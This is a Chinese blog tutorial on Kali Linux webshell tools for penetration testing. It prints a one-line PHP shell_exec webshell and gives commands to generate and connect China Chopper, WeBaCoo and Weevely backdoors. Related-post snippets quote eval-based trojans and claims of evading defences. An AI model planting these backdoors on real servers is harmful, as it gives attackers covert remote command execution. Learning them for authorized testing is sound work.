Kali渗透测试_WebShell

最新推荐文章于 2024-06-04 10:18:09 发布
最新推荐文章于 2024-06-04 10:18:09 发布
阅读量594 收藏 5
点赞数
分类专栏: kali_linux渗透测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42952508/article/details/126579113
版权
  • 之前我们介绍过一句话的webshell
<?php echo shell_exec($_GET['cmd']);?>

  • 中国菜刀

  • 可能被IDS、AV、WAF、扫描器软件发现查杀

中国菜刀

  • 下载好了之后,复制这个代码去服务器

图片

图片

  • 之后运行客户端程序并添加服务器地址

图片

图片

  • 然后双击就可以正常连接了

WeBaCoo(Web Backdoor Cookie)

  • 类终端的shell

  • 编码通信内容通过cookie头传输,隐蔽性较强

  • cm:base64编码的命令

  • cn:服务器用于返回数据

  • cp:返回信息定界符

生成服务端
webacoo -g -o a.php

图片

客户端去连接,可以正常连接;

webacoo -t -u http://IP/a.php

图片

  • 当然他还有其他很多的命令,自己去试试把

图片

Weevely

  • 隐蔽的类终端PHP Webshell

  • 30多个管理模块

  • 执行系统命令、浏览文件系统

  • 检查服务器常见配置错误

  • 创建正向、反向TCP SHELL连接

  • 通过目标计算机代理HTTP流量

  • 从目标计算机进行端口扫描,渗透内网

  • 支持连接密码

首先需要安装一下库文件

  • 首先访问这个网站https://pypi.python.org/pypi/PySocks/

图片

  • 之后解压出来,然后./setup.py install

图片

  • 生成服务端并传入至服务器中
weevely generate 123456 wee.php    (132456为连接密码)

图片

图片

  • 之后可以连接了
weevely http://192.168.0.119/wee.php 123456 (123456就是设置的密码)

图片

  • 当然还有很多的可利用模块,大家可以试试

图片

网络点点滴
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali Linux渗透测试(安全牛).txt
04-17
│ 任务001:Kali Linux渗透测试介绍.mp4 │ ├─第2章 Kali安装 │ 任务002:Kali Linux安装-硬盘安装、虚拟机安装.mp4 │ 任务003:Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令.mp4 │ 任务004:...
kali下的webshell工具-Weevely
@小张小张的博客
09-29 3693
kali下的webshell工具-Weevely weevely是适用于php网站的webshell工具,使用weevely生成的木马免杀能力较强,而且使用加密连接,往往能轻松突破WAF拦截。 Weevely工具使用Python语言编写,集生成木马与连接于一身,相当于Linux中的中国菜刀,但只适用于php网站,支持图片与.htaccess两种绕过方式。生成的木马文件进行了base64加密处理。它实现了SSH 风格的终端界面,并有大量自动化的模块。测试人员可用它执行系统指令、远程管理和渗透后期的自动渗透;
Kali工具-webshell之weevely
liwangjin0116的专栏
03-29 733
kali中常用的webshell工具-weevely,可以对网站的文件上传漏洞进行测试。
从实践中学习Kali Linux渗透测试
cc123489ll的博客
06-04 654
1.1.1 黑盒测试黑盒测试(Black-box Testing)也称为外部测试(ExternalTesting)。采用这种方式,测试者将从一个远程网络位置评估目标网络基础设施,并没有任何目标网络内部拓扑等相关信息。完全模拟真实网络环境中的外部攻击者,采用流行技术与工具有组织、有步骤的对目标组织进行渗透和入侵,揭示目标网络中一些已知或未知的安全漏洞,并评估这些漏洞能否被利用。优点:有利于挖掘出系统潜在的漏洞,以及脆弱环节和薄弱点。缺点:测试较为费时和费力,同时需要渗透测试者具备较高的技术能力。
WebShell攻击流程大揭秘: 渗透测试必备技能(网页后门)
weixin_43263566的博客
01-25 1万+
Webshell(网页后门)
Kali Linux渗透测试——WEB渗透(二)
Captain_RB的博客
01-21 9672
Kali Linux渗透测试——WEB渗透(二) 笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程 文章目录Kali Linux渗透测试——WEB渗透(二)漏洞挖掘1.目录遍历/文件包含2.文件上传3.SQL注入4.XSS(Cross-Site Scripting)5.CSRF(Cross Site Request Forgery)6.WebShell7.HTTPS攻击8.P...
网络安全、渗透测试、安全服务面试题
最新发布
07-01
因此,在面试前回顾并梳理自己的项目经历尤为重要,特别是那些成功的攻防案例、渗透测试经验、漏洞挖掘等实战经历,这些都能够为面试加分。 - **复盘准备**:在面试前,建议对参与过的项目进行一次全面的复盘,包括...
WEB渗透测试入门.rar
03-07
3. Kali Linux:集成大量渗透测试工具的操作系统,方便进行实战演练。 总之,Web渗透测试是网络安全领域的重要技能,涉及广泛的知识和实践经验。对于初学者,从基础理论开始,逐步学习并实践各种漏洞利用技巧,是...
kali-linux-web-pentest-cookbook
06-24
Kali Linux Web Penetration Testing Cookbook》是一本深入探讨网络安全领域的专业书籍,专注于使用Kali Linux进行Web应用程序渗透测试的技巧和策略。Kali Linux,原名BackTrack,是一款广泛应用于安全审计和网络...
渗透安全面试题库-v3.pdf
08-10
面试题库中的内容涵盖了渗透测试的主要步骤,包括信息收集、漏洞扫描、漏洞利用、权限提升、日志清理和总结报告。以下是这些知识点的详细说明: 1. **信息收集**:这是渗透测试的第一步,包括域名Whois信息收集、...
kali渗透测试-WebShell(中国菜刀、WeBaCoo、Weevely)
热门推荐
小水池
07-27 2万+
本质 : windows平台 中国菜刀 支持asp、php、asp.net和jsp等 可能被IDS、AV、WAF、扫描器软件发现查杀 使用方法: 往目标web服务器上传相应的一句话木马 asp一句话木马: &amp;amp;lt;%execute(request(&amp;quot;pass&amp;quot;))%&amp;amp;gt; php一句话木马: &amp;amp;lt;?php @eval($_POS
网站攻击到提权的全部过程
kali_Ma的博客
09-28 1万+
准备工作 靶机(被攻击方):win7系统 入侵者(攻击方):win10系统、kali系统 首先启动win7系统,搭建一个常见的校园网站,然后映射到局域网,使得我们能正常访问。 从网站拿到webshell 2021最新整理网络安全/渗透测试/安全学习/100份src技术文档(全套视频、大厂面经、精品手册、必备工具包、路线)一>获取<一 sql注入漏洞 把整个网站浏览完一遍后,我们发现这里的url为?id=10结尾,我们猜测可能是一个sql注入点。 首先我们在id=10后面加上一个单引号’进行判
学习Kali渗透测试笔记
m0_51418771的博客
09-13 1952
学习笔记
Kali Linux渗透测试 102 利用工具-Webshell
kevinhanser
03-26 2931
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. Webshell 演示 在被攻击者新建 webshell 文件root@metasploitable:/var/www# cat test.php <?php echo shell_exec($_GE
Kali自带的webshell客户端
Yale的博客
12-26 3380
0x01 第一个要介绍的是webacoo。 webacoo旨在通过HTTP在客户端和web服务器之间提供类似隐形终端连接。它是一个后渗透利用工具,能够维持对已被拿下的web服务器的权限访问。WeBaCoo可以绕过最新的AV,NIDS,IPS,网络防火墙和应用防火墙的检测,能够在被拿下的服务器中悄无声息的执行系统命令。 首先使用-h看看用法 简单的翻译如下: -g Generate bac...
利用漏洞注入
m0_71383067的博客
06-04 243
在计算机安全领域,漏洞注入是一种常见的攻击技术,它利用软件漏洞或安全漏洞来攻击计算机系统。漏洞注入可以用于窃取数据、获取系统权限、破坏系统等各种恶意行为。为了保护计算机系统的安全,渗透测试和漏洞注入已经成为一个必不可少的领域。本文将介绍漏洞注入的基本原理和方法,使用漏洞注入进行攻击的常见技术和工具,以及如何使用漏洞注入来防范攻击。此外,本文还提供了一系列实用的漏洞注入示例,以帮助读者更好地理解和应用这些技术。无论您是一名网络安全专业人员还是一个普通用户,理解漏洞注入的原理和方法都非常重要。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 752
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
kali中的webshell工具--webacoo
weixin_30698527的博客
03-10 904
webacoo webshell其实就是放置在服务器上的一段代码 kali中生成webshell的工具 WeBaCoo(Web Backdoor Cookie) 特点及使用方法 类终端的shell 编码通信内容通过cookie头传输,隐蔽性强 cookie中传递数据使用的参数: cm:base64编码的命令 cn:服务器用于返回数据的cooki...
kali webshell
03-16
Kali Webshell是一种基于Kali Linux操作系统的Webshell工具,可以用于在Web服务器上执行命令和管理文件。它具有强大的功能和灵活的配置选项,可以帮助渗透测试人员和安全专家快速发现和修复Web应用程序中的漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值